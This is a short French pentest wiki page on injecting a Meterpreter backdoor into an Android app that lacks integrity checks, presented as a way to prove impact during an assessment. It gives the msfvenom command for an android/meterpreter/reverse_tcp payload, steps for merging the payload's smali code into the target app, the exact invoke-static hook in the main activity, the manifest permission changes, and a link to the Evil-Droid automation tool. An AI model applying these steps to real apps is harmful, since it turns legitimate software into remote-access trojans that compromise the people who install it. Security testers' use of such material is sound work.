💔Injection de backdoor
Si l'application ne semble pas faire de vérification d'intégrité, il peut être intéressant de PoC l'impact rendu possible en y ajoutant un payload meterpreter afin de montrer qu'il est possible de modifier l'application pour la transformer en trojan.
Étapes à suivre
Générer une charge utile avec msfvenom
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<Listener IP> LPORT=<Listener Port> R > payload.apk
Décompiler l'application cible et l'application créée par msfvenom
Placer le code smali de l'application msfvenom dans le répertoire contenant le code smali de l'application cible.
/path/to/payload/smali/com/metasploit/stage dans /path/to/target/smali/com/metasploit/stage
Repérer l'activité principale de l'application cible dans son manifest.
Dans le code smali de l'activité principale, trouver le moyen d'appeler le code smali de l'application msfvenom.
Deviens, invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Ajouter les permissions nécessaires à l'application dans son manifest pour faire fonctionner meterpreter de façon optimale.
Lancer l'application et vérifier que le shell est bien lancé dans le listener.
Ressource
Outils
Evil-Droid
Permet de faire exactement la même chose de manière semi-automatisé.
ressource: https://github.com/M4sc3r4n0/Evil-Droid
Dernière mise à jour